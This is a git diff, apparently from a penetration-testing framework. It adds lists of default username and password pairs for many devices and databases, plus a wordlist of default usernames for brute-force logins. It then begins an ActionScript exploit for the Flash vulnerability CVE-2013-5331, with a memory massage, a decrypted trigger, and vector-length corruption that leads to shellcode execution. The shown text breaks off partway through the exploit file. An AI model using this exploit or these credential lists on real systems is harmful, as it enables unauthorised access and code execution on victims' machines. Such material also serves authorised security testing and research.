+ nz0u4bbe
+fam fam
+ bell9
+Oper Oper
+RMAIL RMAIL
+administrator 19750407
+FND FND
+admin exinda
+PRIV PRIV
+admin barney
+SETUP 
+ biodata
+ 24Banc81
+news news
+VSEIPO 
+ j09F
+pw pw
+GUEST 
+ilon ilon
+ award_?
+SYS 0RACLE39
+SYS 0RACLE38
+DEFAULT DEFAULT
+ AMI!SW
+PLSQL SUPERSECRET
+root alpine
+politcally correct
+18140815 18140815
+APPUSER APPUSER
+SUPERVISOR 
+CENTRA CENTRA
+LBACSYS LBACSYS
+ alfarome
+PDP8 PDP8
+SFCMI 
+administrator * * #
+lpadm lpadm
+Test Everything 
+bewan bewan
+ 2580
+DIP DIP
+ Sxyz
+mfd mfd
+MDDEMO MDDEMO
+ intermec
+ 589589
+SWPRO SWPRO
+DES DES
+root fibranne
+Coco hello
+GCS 
+rodopi rodopi
+ touchpwd=
+Scott Tiger
+Admin5 4tugboat
+admin funkwerk
+ANDY SWORDFISH
+DESQUETOP 
+nobody 
+Manager 657
+ mysweex
+SYSTEM SYSLIB
+NETCON NETCON
+JONES STEEL
+author author
+MOESERV 
+web web
+tech User
+PUBSUB1 PUBSUB1
+SYS D_SYSPW
+CATALOG CATALOG
+ IBM
+ Guest
+SQLUSER 
+RE RE
+REPORTS_USER OEM_TEMP
+MFG MFG
+POST POST
+HPLASER HPLASER
+HR HR
+VIDEOUSER VIDEO USER
+DBA SQL
+ CMOSPWD
+guest1 guest
+superuser asante
+SYSTEM 0RACLE38
+SYSTEM 0RACLE39
+AUTOLOG1 
+dadmin dadmin
+AURORA$JIS$UTILITY$ 
+wlcsystem wlcsystem
+news 
+CPRM 
diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt
new file mode 100644
index 0000000000..c36f0e7e2b
--- /dev/null
+++ b/data/wordlists/default_users_for_services_unhash.txt
@@ -0,0 +1,915 @@
+admin
+
+root
+Administrator
+sysadm
+tech
+operator
+guest
+security
+debug
+manager
+service
+!root
+user
+netman
+super
+diag
+Cisco
+Manager
+DTA
+apc
+User
+Admin
+cablecom
+adm
+wradmin
+netscreen
+sa
+setup
+cmaker
+enable
+MICRO
+login
+write
+monitor
+netopia
+op
+adminview
+sysadmin
+echo
+craft
+maint
+comcast
+CSG
+readonly
+manuf
+cusadmin
+smc
+sweex
+disttech
+su
+poll
+SYSDBA
+anonymous
+support
+recovery
+USERID
+eng
+administrator
+NETWORK
+JDE
+Guest
+rwa
+USER
+test
+lp
+ro
+MAIL
+ami
+hsa
+system
+MGR
+ADMINISTRATOR
+FIELD
+PBX
+HELLO
+hscroot
+1502
+superuser
+netrangr
+readwrite
+piranha
+wlse
+l3
+none
+naadmin
+public
+NETOP
+MANAGER
+demo
+D-Link
+l2
+rw
+cgadmin
+storwatch
+vcr
+OPERATOR
+MDaemon
+jagadmin
+enquiry
+at4400
+davox
+PFCUser
+aaa
+topicalt
+admin2
+1234
+nms
+client
+sys
+field
+deskman
+SYSADM
+superadmin
+pmd
+GEN2
+ADMN
+Factory
+PRODDTA
+tellabs
+spcl
+dadmin
+helpdesk
+dhs3mt
+install
+adfexc
+IntraSwitch
+manage
+superman
+SPOOLMAN
+ADVMAIL
+vt100
+PSEAdmin
+patrol
+teacher
+PCUSER
+Any
+RSBCMON
+cellit
+inads
+halt
+locate
+TMAR#HWMT8007079
+rapport
+xbox
+device
+NICONEX
+acc
+31994
+bcim
+websecadm
+blue
+topicnorm
+supervisor
+ccrusr
+266344
+telecom
+GEN1
+SSA
+HTTP
+mtch
+bciim
+browse
+hydrasna
+deskres
+bbsd-client
+replicator
+intel
+radware
+intermec
+mlusr
+init
+e250
+Polycom
+temp1
+mac
+3comcso
+RMUser1
+WP
+NAU
+rcust
+mtcl
+topicres
+bcnas
+adminuser
+Root
+cac_admin
+mediator
+Anonymous
+kermit
+volition
+GlobalAdmin
+LUCENT01
+LUCENT02
+adminstat
+desknorm
+IntraStack
+e500
+deskalt
+cust
+tiara
+bcms
+m1122
+telco
+xd
+dhs3pms
+VNC
+customer
+cisco
+adminstrator
+ftp_nmc
+me
+iclock
+scmadmin
+installer
+webadmin
+ftp_inst
+DDIC
+SYSTEM
+draytek
+EARLYWATCH
+super.super
+ftp_oper
+corecess
+weblogic
+system/manager
+End
+d.e.b.u.g
+target
+MD110
+tiger
+adminttd
+wlseuser
+SAPCPIC
+ftp_admi
+default.password
+7
+2
+ADMIN
+itsadmin
+PUBSUB
+CTXSYS
+ftp
+bill
+192.168.1.1
+setpriv
+GUEST
+SAP*
+t3admin
+hello
+CISCO15
+1.79
+mso
+Telecom
+qsysopr
+APPS
+Developer
+mail
+qsecofr
+11111
+Service
+netadmin
+any
+db2fenc1
+johnson
+isp
+demos
+QSRV
+MDSYS
+vpasp
+TEST
+QSECOFR
+1
+informix
+5
+engmode
+scout
+qpgmr
+ADSL
+images
+Gearguy
+Demo
+serial#
+BACKUP
+stratacom
+6.x
+mary
+COMPANY
+SYS
+DSL
+Jetform
+eagle
+ROUTER
+ods
+siteadmin
+Alphanetworks
+Admin1
+janta
+servlet
+username
+citel
+Replicator
+SYSMAN
+master
+SUPERUSER
+cn=orcladmin
+30
+maintainer
+BRIO_ADMIN
+internal
+CQSCHEMAUSER
+DEV2000_DEMOS
+FSFTASK1
+checkfs
+USER1
+SQLDBA
+HELP
+toor
+qsrvbas
+SYSADMIN
+EZsetup
+BATCH
+STRAT_USER
+primenet
+OEMREP
+USER6
+lynx
+powerdown
+$ALOC$
+password
+VOL-0215
+tomcat
+REP_MANAGER
+WinCCConnect
+ALLIN1
+DIRMAINT
+eqadmin
+QSRVBAS
+AQJAVA
+LASERWRITER
+PERFSTAT
+apcuser
+MBWATCH
+system_admin
+unix
+OWNER
+NETPRIV
+VSEMAINT
+DEMO
+SYMPA
+REP_OWNER
+DCL
+FAX
+ARCHIVIST
+VTAMUSER
+VMTAPE
+basisk
+NetLinx
+OutOfBox
+NETMGR
+DEFAULT
+OAS_PUBLIC
+read
+AP
+MTSSYS
+SYSMAINT
+AUDIOUSER
+Joe
+IDMS
+$SRV
+snake
+ROOT
+PRINTER
+shutdown
+satan
+RDM470
+trouble
+fax
+OP1
+admin@example.com
+HOST
+ADLDEMO
+QS_ADM
+bin
+OPER
+oracle
+jj
+PO7
+www
+joe
+MAINT
+CMSBATCH
+CCC
+role1
+DATAMOVE
+MSHOME
+ISPVM
+crowd­-openid-­server
+user_editor
+sedacm
+db2admin
+Airaya
+SYSDUMP1
+IMEDIA
+primos_cs
+USER_TEMPLATE
+pnadmin
+lpadmin
+VTAM
+TRACESVR
+POSTMASTER
+MAILER
+RSCSV2
+QS_WS
+circ
+nobody
+Tasman
+DISCOVERER_ADMIN
+VMASMON
+LR-ISDN
+TURBINE
+GL
+PO
+PRINT
+MODTEST
+GATEWAY
+PRIMARY
+both
+haasadm
+pw
+games
+DOCSIS_APP
+bbs
+EMP
+postmaster
+SITEMINDER
+vgnadmin
+RJE
+gonzo
+NEWS
+AQUSER
+UTLBSTATU
+netbotz
+xmi_demo
+ORACACHE
+MCUser
+prash
+sync
+PM
+AP2SVP
+ibm
+ULTIMATE
+SABRE
+user_pricer
+SUPERVISOR
+EVENT
+PORTAL30_SSO_PS
+FSFADMIN
+OO
+WKSYS
+OPERATNS
+UVPIM_
+OE
+OCITEST
+web
+ESSEX
+None
+CTXDEMO
+user_designer
+QDBA
+role
+LRISDN
+tele
+WEBCAL01
+rsadmin
+OMWB_EMULATION
+WINDOWS_PASSTHRU
+MOREAU
+fast
+host
+ORDPLUGINS
+SYSWRM
+savelogs
+SDOS_ICSAP
+DSSYS
+MGWUSER
+TDOS_ICSAP
+ssp
+EJSADMIN
+INGRES
+DS
+estheralastruey
+VCSRV
+ssladmin
+CLARK
+OEMADM
+restoreonly
+quser
+MILLER
+trmcnfg
+REPORT
+user_author
+dpn
+tour
+mountfsys
+http
+PROG
+openfiler
+RAID
+STARTER
+FAXUSER
+DSA
+daemon
+mountsys
+backuponly
+IVPM1
+USER3
+OPENSPIRIT
+prime
+HPLASER
+CSPUSER
+qsvr
+SYSCKP
+Sysop
+user_marketer
+IMAGEUSER
+bsxuser
+MASTER
+USER9
+OLAPSYS
+rje
+ODM_MTR
+QS_ES
+lansweeperuser
+DEMO3
+Username
+GPLD
+uucp
+DBSNMP
+VMARCH
+SWUSER
+Operator
+CHEY_ARCHSVR
+roo
+n.a
+accounting
+backuprestore
+dni
+WEBADM
+iceman
+guru
+anon
+USER8
+PORTAL30_SSO_PUBLIC
+postgres
+WINSABRE
+USERP
+IVPM2
+PORTAL30_SSO
+ALLIN1MAIL
+POST
+TEMP
+BATCH1
+PROMAIL
+SECDEMO
+ARAdmin
+sadmin
+ORAREGSYS
+VMASSYS
+man
+FROSTY
+LASER
+tutor
+DISKCNT
+default
+SYSERR
+WWW
+VAX
+PROCAL
+FAXWORKS
+LDAP_Anonymous
+(any
+setup/snmp
+DSGATEWAY
+AWARD_SW
+CSMIG
+umountfsys
+VMS
+bpel
+viewuser
+TDISK
+politically
+user_analyst
+RSCS
+COMPIERE
+OSP22
+guest1
+FORSE
+factory
+bubba
+QUSER
+primeos
+glftpd
+RMAN
+mountfs
+DIRECT
+firstsite
+IPFSERV
+TSUSER
+BATCH2
+snmp
+WebAdmin
+IBMUSER
+SMART
+voadmin
+BC4J
+core
+OPERVAX
+Bobo
+WANGTEK
+OWA
+USER2
+jasperadmin
+VMBSYSAD
+PVM
+ctb_admin
+&nbsp;
+DEMO4
+qsrv
+superdba
+PORTAL30
+XPRT
+Crowd
+18364
+ilom-admin
+rdc123
+sysopr
+tasman
+blank
+WEBREAD
+ODM
+11111111
+AURORA$ORB$UNAUTHENTICATED
+ADAMS
+Craft
+rfmngr
+SYSTEST_CLIG
+user_approver
+ilom-operator
+Nice-admin
+answer
+NETNONPRIV
+nuucp
+CIDS
+VASTEST
+redline
+MBMANAGER
+webmaster
+APPLSYS
+USER4
+hqadmin
+UOMNI_
+VMUTIL
+uucpadm
+EXFSYS
+4Dgifts
+JMUSER
+CIS
+UNITY_
+HLW
+pwrchute
+IDMSSE
+NSA
+TELEDEMO
+recover
+TRAVEL
+lexar
+viewer
+LIBRARY
+PO8
+root@localhost
+NAMES
+secofr
+PDMREMI
+MGE
+USER7
+OWA_PUBLIC
+questra
+builtin
+SFCNTRL
+boss
+PLEX
+OLAPDBA
+OLAPSVR
+user_expert
+Bhosda
+gropher
+TAHITI
+NEWINGRES
+VM3812
+VIF_DEVELOPER
+joeuser
+IPC
+HELPDESK
+wlpisystem
+TSAFVM
+prtgadmin
+UAMIS_
+theman
+CISINFO
+mobile
+QS_CB
+CDEMORID
+DEMO2
+PORTAL30_PUBLIC
+MDDEMO_CLERK
+PHANTOM
+ODS
+BLAKE
+TSDEV
+PRODBM
+dos
+APL2PP
+god1
+CICSUSER
+22222222
+user_publisher
+OSE$HTTP$ADMIN
+def
+SuperUser
+QS_CBADM
+SYSA
+STUDENT
+Draytek
+SMDR
+EREP
+VSEMAN
+fwadmin
+MTS_USER
+AQDEMO
+private
+IS_$hostname
+HPSupport
+ORASSO
+CVIEW
+SH
+XXSESS_MGRYY
+VMMAP
+PORTAL30_DEMO
+Ezsetup
+QS_CS
+CMSUSER
+DEMO1
+userNotUsed
+ncadmin
+TESTPILOT
+fg_sysadmin
+UETP
+QS
+DBI
+JWARD
+APPS_MRC
+Moe
+SENTINEL
+Yak
+PDP11
+Flo
+SLIDE
+INFO
+checkfsys
+PRODCICS
+MXAGENT
+VMTLIBR
+POWERCARTUSER
+VMBACKUP
+CPNUC
+distrib
+MIGRATE
+CDEMOUCB
+OLTSEP
+sysbin
+signa
+autocad
+WEBDB
+ncrm
+SAMPLE
+HCPARK
+ALLINONE
+nm2user
+SAVSYS
+IIPS
+PATROL
+mailadmin
+TMSADM
+ESubscriber
+software
+god2
+FSFTASK2
+ORDSYS
+gopher
+PSFMAINT
+EAdmin
+12345
+DECNET
+OPERATIONS
+$system
+PANAMA
+LIBRARIAN
+fal
+NETSERVER
+POWERCHUTE
+USER5
+GPFD
+QS_OS
+REPADMIN
+0
+DEMO8
+DEMO9
+CDEMO82
+umountsys
+USER0
+CDEMOCOR
+SYSTEST
+Rodopi
+user_checker
+qserv
+AQ
+SAPR3
+VRR1
+fastwire
+admi
+FINANCE
+WinCCAdmin
+ESTOREUSER
+VIRUSER
+LINK
+APPLSYSPUB
+overseer
+checksys
+umountfs
+DBDCCICS
+TOAD
+ntpupdate
+MDDEMO_MGR
+billy-bob
+DECMAIL
+alien
+nsroot
+AdvWebadmin
+dvstation
+SERVICECONSUMER1
+MMO2
+NOC
+WWWUSER
+SAP
+NEVIEW
+ODSCOMMON
+pixadmin
+ripeop
+PENG
+netlink
+L2LDEMO
+OUTLN
+12.x
+scott
+dbase
+fam
+Oper
+RMAIL
+FND
+PRIV
+SETUP
+news
+VSEIPO
+ilon
+PLSQL
+politcally
+18140815
+APPUSER
+CENTRA
+LBACSYS
+PDP8
+SFCMI
+lpadm
+Test
+bewan
+DIP
+mfd
+MDDEMO
+SWPRO
+DES
+Coco
+GCS
+rodopi
+Scott
+Admin5
+ANDY
+DESQUETOP
+NETCON
+JONES
+author
+MOESERV
+PUBSUB1
+CATALOG
+SQLUSER
+RE
+REPORTS_USER
+MFG
+HR
+VIDEOUSER
+DBA
+AUTOLOG1
+AURORA$JIS$UTILITY$
+wlcsystem
+CPRM
diff --git a/external/source/exploits/CVE-2013-5331/Exploit.as b/external/source/exploits/CVE-2013-5331/Exploit.as
new file mode 100755
index 0000000000..801edd0184
--- /dev/null
+++ b/external/source/exploits/CVE-2013-5331/Exploit.as
@@ -0,0 +1,897 @@
+//Compile:  mxmlc.exe Exploit.as -o Exploit.swf
+
+package
+{
+	import flash.display.Sprite;
+	import flash.utils.ByteArray;
+	import flash.net.LocalConnection;
+	import flash.utils.Endian;
+	import flash.net.FileReference;
+	import __AS3__.vec.Vector;
+	import flash.system.Capabilities;
+	import flash.display.Loader;
+	import flash.utils.setTimeout;
+	
+	import flash.display.LoaderInfo;
+			
+	public class Exploit extends Sprite
+	{
+		var number_massage_vectors:uint = 0x18000;		
+		var len_massage_vector:uint = 0x36;		
+		var maxElementsPerPage:uint = 0xe00012;		
+		var massage_array:Array;		
+		var tweaked_vector;
+		var tweaked_vector_address;	
+		var done:Boolean = false;		
+		var receiver:LocalConnection;	
+		// Embedded trigger, ActionScript source available at the end of this file as code comment.		
+		var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8e571f62dc4eb77d04b90ebbffc1db134";
+		var key:uint = 3.627461843E9;
+		var shellcodeObj:Array;
+		
+		public function Exploit() {
+			var trigger_decrypted:uint = 0;
+			super();			
+			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");			
+			var i:* = 0;
+			this.massage_array = new Array();
+			
+			// Memory massage 
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(1);
+				i++;
+			}
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(this.len_massage_vector);
+				this.massage_array[i][0] = 0x41414141;
+				i++;
+			}
+			var j:* = 0;
+			i = 0;
+			while(i < this.number_massage_vectors)
+			{
+				j = 0;
+				while(j < 32)
+				{
+					this.massage_array[i][j] = 0x41414141;
+					j++;
+				}
+				i++;
+			}
+			var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8);
+			i = 65536 + 6;
+			while(i < this.number_massage_vectors)
+			{
+				this.massage_array[i] = new Vector.<int>(this.len_massage_vector * 2);
+				this.massage_array[i][0] = 0x42424242;
+				i = i + k;
+			}
+			
+			// Decompress/Decrypt trigger
+			this.receiver = new LocalConnection();
+			this.receiver.connect("toAS3");
+			this.receiver.client = this;
+			var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf);
+			trigger_byte_array.endian = Endian.LITTLE_ENDIAN;
+			trigger_byte_array.uncompress();
+			trigger_byte_array.position = 0;
+			i = 0;
+			while(i < trigger_byte_array.length / 4)
+			{
+				trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key;
+				trigger_byte_array.position = trigger_byte_array.position - 4;
+				trigger_byte_array.writeUnsignedInt(trigger_decrypted);
+				i++;
+			}
+			trigger_byte_array.position = 0;
+			
+			// Trigger corruption
+			var trigger_loader:Loader = new Loader();
+			trigger_loader.loadBytes(trigger_byte_array);
+			
+			// Handler to check for corruption
+			setTimeout(this.as2loaded,4000,[]);
+		}
+		
+		function createByteArray(hex_string:String) : ByteArray {
+			var byte:String = null;
+			var byte_array:ByteArray = new ByteArray();
+			var hex_string_length:uint = hex_string.length;
+			var i:uint = 0;
+			while(i < hex_string_length)
+			{
+				byte = hex_string.charAt(i) + hex_string.charAt(i + 1);
+				byte_array.writeByte(parseInt(byte,16));
+				i = i + 2;
+			}
+			return byte_array;
+		}
+		
+		// When param1.length > 0 it's called from the corruption trigger
+		// Else it's called because of the timeout trigger
+		public function as2loaded(param1:Array) : * {
+			var back_offset:* = undefined; // backward offset from the tweaked vector
+			var j:* = undefined;
+			var _loc15_:uint = 0;
+			var ninbets:Array = null;
+			var array_with_code:Array = null;
+			var address_code:uint = 0;
+			var _loc19_:uint = 0;
+			if(this.done == true)
+			{
+				return;
+			}			
+			if(param1.length > 0)
+			{
+				this.done = true;
+			}			
+			var corrupted_index:uint = 0;
+			var i:* = 0;
+			i = 0x10000 + 6;
+			
+			// Search corrupted vector
+			while(i < this.number_massage_vectors)
+			{
+				if(this.massage_array[i].length != 2 * this.len_massage_vector)
+				{
+					if(this.massage_array[i].length != this.len_massage_vector)
+					{
+						corrupted_index = i;
+						this.massage_array[i][0] = 0x41424344;
+						break;
+					}
+				}
+				i++;
+			}
+			
+			// throw Error if any vector has been corrupted
+			if(i == this.number_massage_vectors)
+			{
+				throw new Error("not found");
+			}			
+			else // start the magic...
+			{
+				// Tweak the length for the vector next to the corrupted one
+				this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001; 
+				// Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory
+				this.tweaked_vector = this.massage_array[corrupted_index + 1]; 
+				var offset_length = 0;
+				// Ensure tweaked vector length corruption, I guess the offset to the vector length
+				// changes between flash versions
+				if(this.tweaked_vector.length != 0x40000001)
+				{
+					this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001;
+					offset_length = 10;
+				}				
+				if(param1.length > 0) // From the corruption trigger
+				{
+					// Fix the massage array of vectors, restores the corrupted vector and
+					// marks it as the last one.
+					back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87
+					j = 0;
+					/*
+					tweaked_vector->prior->prior, some data is overwritten, is used for search purposes
+					tweaked_vector[3fffffa7] = 0
+					tweaked_vector[3fffffa8] = 0
+					tweaked_vector[3fffffa9] = 1c0340
+					tweaked_vector[3fffffaa] = ffffffff
+					tweaked_vector[3fffffab] = 0
+					tweaked_vector[3fffffac] = 0
+					tweaked_vector[3fffffad] = 0
+					tweaked_vector[3fffffae] = 0
+					tweaked_vector[3fffffaf] = 0
+					tweaked_vector[3fffffb0] = 0
+					tweaked_vector[3fffffb1] = 0
+					tweaked_vector[3fffffb2] = 100
+					tweaked_vector[3fffffb3] = 0
+					tweaked_vector[3fffffb4] = 0
+					tweaked_vector[3fffffb5] = 0
+					tweaked_vector[3fffffb6] = 0
+					tweaked_vector[3fffffb7] = 100dddce
+					tweaked_vector[3fffffb8] = 0
+					tweaked_vector[3fffffb9] = 1df6000
+					tweaked_vector[3fffffba] = 1dc2380
+					tweaked_vector[3fffffbb] = 0
+					tweaked_vector[3fffffbc] = 10000
+					tweaked_vector[3fffffbd] = 70
+					tweaked_vector[3fffffbe] = 0
+					tweaked_vector[3fffffbf] = 4
+					tweaked_vector[3fffffc0] = 0
+					tweaked_vector[3fffffc1] = 1de7090
+					tweaked_vector[3fffffc2] = 4
+					tweaked_vector[3fffffc3] = 0
+					tweaked_vector[3fffffc4] = 0
+					tweaked_vector[3fffffc5] = 0
+					// tweaked_vector->prior
+					tweaked_vector[3fffffc6] = 36 // Length
+					tweaked_vector[3fffffc7] = 1dea000
+					tweaked_vector[3fffffc8] = 41414141
+					tweaked_vector[3fffffc9] = 41414141
+					tweaked_vector[3fffffca] = 41414141
+					tweaked_vector[3fffffcb] = 41414141
+					tweaked_vector[3fffffcc] = 41414141
+					tweaked_vector[3fffffcd] = 41414141
+					tweaked_vector[3fffffce] = 41414141
+					tweaked_vector[3fffffcf] = 41414141
+					tweaked_vector[3fffffd0] = 41414141
+					tweaked_vector[3fffffd1] = 41414141
+					tweaked_vector[3fffffd2] = 41414141
+					tweaked_vector[3fffffd3] = 41414141
+					tweaked_vector[3fffffd4] = 41414141
+					tweaked_vector[3fffffd5] = 41414141
+					tweaked_vector[3fffffd6] = 41414141
+					tweaked_vector[3fffffd7] = 41414141
+					tweaked_vector[3fffffd8] = 41414141
+					tweaked_vector[3fffffd9] = 41414141
+					tweaked_vector[3fffffda] = 41414141
+					tweaked_vector[3fffffdb] = 41414141
+					tweaked_vector[3fffffdc] = 41414141
+					tweaked_vector[3fffffdd] = 41414141
+					tweaked_vector[3fffffde] = 41414141
+					tweaked_vector[3fffffdf] = 41414141
+					tweaked_vector[3fffffe0] = 41414141
+					tweaked_vector[3fffffe1] = 41414141
+					tweaked_vector[3fffffe2] = 41414141
+					tweaked_vector[3fffffe3] = 41414141
+					tweaked_vector[3fffffe4] = 41414141
+					tweaked_vector[3fffffe5] = 41414141
+					tweaked_vector[3fffffe6] = 41414141
+					tweaked_vector[3fffffe7] = 41414141
+					tweaked_vector[3fffffe8] = 0
+					tweaked_vector[3fffffe9] = 0
+					tweaked_vector[3fffffea] = 0
+					tweaked_vector[3fffffeb] = 0
+					tweaked_vector[3fffffec] = 0
+					tweaked_vector[3fffffed] = 0
+					tweaked_vector[3fffffee] = 0
+					tweaked_vector[3fffffef] = 0
+					tweaked_vector[3ffffff0] = 0
+					tweaked_vector[3ffffff1] = 0
+					tweaked_vector[3ffffff2] = 0
+					tweaked_vector[3ffffff3] = 0
+					tweaked_vector[3ffffff4] = 0
+					tweaked_vector[3ffffff5] = 0
+					tweaked_vector[3ffffff6] = 0
+					tweaked_vector[3ffffff7] = 0
+					tweaked_vector[3ffffff8] = 0
+					tweaked_vector[3ffffff9] = 0
+					tweaked_vector[3ffffffa] = 0
+					tweaked_vector[3ffffffb] = 0
+					tweaked_vector[3ffffffc] = 0
+					tweaked_vector[3ffffffd] = 0
+					*/
+					while(j < back_offset)
+					{
+						this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j];
+						j++;
+					}
+					// tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata
+					this.tweaked_vector[0x40000000-1] = param1[back_offset + 1];
+					
+					
+					j = back_offset + 2;
+					
+					// Modifies the tweaked vector content, and overflow the next ones, they just remain in good state:
+					/*
+					// tweaked vector content
+					tweaked_vector[0] = 41414141
+					tweaked_vector[1] = 41414141
+					tweaked_vector[2] = 41414141
+					tweaked_vector[3] = 41414141
+					tweaked_vector[4] = 41414141
+					tweaked_vector[5] = 41414141
+					tweaked_vector[6] = 41414141
+					tweaked_vector[7] = 41414141
+					tweaked_vector[8] = 41414141
+					tweaked_vector[9] = 41414141
+					tweaked_vector[a] = 41414141
+					tweaked_vector[b] = 41414141
+					tweaked_vector[c] = 41414141
+					tweaked_vector[d] = 41414141
+					tweaked_vector[e] = 41414141
+					tweaked_vector[f] = 41414141
+					tweaked_vector[10] = 41414141
+					tweaked_vector[11] = 41414141
+					tweaked_vector[12] = 41414141
+					tweaked_vector[13] = 41414141
+					tweaked_vector[14] = 41414141
+					tweaked_vector[15] = 41414141
+					tweaked_vector[16] = 41414141
+					tweaked_vector[17] = 41414141
+					tweaked_vector[18] = 41414141
+					tweaked_vector[19] = 41414141
+					tweaked_vector[1a] = 41414141
+					tweaked_vector[1b] = 41414141
+					tweaked_vector[1c] = 41414141
+					tweaked_vector[1d] = 41414141
+					tweaked_vector[1e] = 41414141
+					tweaked_vector[1f] = 41414141
+					tweaked_vector[20] = 0
+					tweaked_vector[21] = 0
+					tweaked_vector[22] = 0
+					tweaked_vector[23] = 0
+					tweaked_vector[24] = 0
+					tweaked_vector[25] = 0
+					tweaked_vector[26] = 0
+					tweaked_vector[27] = 0
+					tweaked_vector[28] = 0
+					tweaked_vector[29] = 0
+					tweaked_vector[2a] = 0
+					tweaked_vector[2b] = 0
+					tweaked_vector[2c] = 0
+					tweaked_vector[2d] = 0
+					tweaked_vector[2e] = 0
+					tweaked_vector[2f] = 0
+					tweaked_vector[30] = 0
+					tweaked_vector[31] = 0
+					tweaked_vector[32] = 0
+					tweaked_vector[33] = 0
+					tweaked_vector[34] = 0
+					tweaked_vector[35] = 0
+					// next to the tweaked vector
+					tweaked_vector[36] = 36
+					tweaked_vector[37] = 1dea000
+					tweaked_vector[38] = 41414141
+					tweaked_vector[39] = 41414141
+					tweaked_vector[3a] = 41414141
+					tweaked_vector[3b] = 41414141
+					tweaked_vector[3c] = 41414141
+					tweaked_vector[3d] = 41414141
+					tweaked_vector[3e] = 41414141
+					tweaked_vector[3f] = 41414141
+					tweaked_vector[40] = 41414141
+					tweaked_vector[41] = 41414141
+					tweaked_vector[42] = 41414141
+					tweaked_vector[43] = 41414141
+					tweaked_vector[44] = 41414141
+					tweaked_vector[45] = 41414141
+					tweaked_vector[46] = 41414141
